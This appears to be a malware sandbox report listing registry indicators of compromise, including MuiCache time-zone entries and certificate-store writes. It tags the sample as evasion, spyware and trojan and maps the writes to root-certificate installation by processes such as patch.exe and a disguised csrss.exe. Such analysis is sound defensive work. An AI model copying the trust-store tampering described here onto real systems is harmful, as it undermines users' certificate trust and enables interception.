Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe

Modifies system certificate store 2 TTPs 13 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

csrss.exe4363463463464363463463463.bin.exepatch.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	4363463463464363463463463.bin.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	4363463463464363463463463.bin.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e4030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988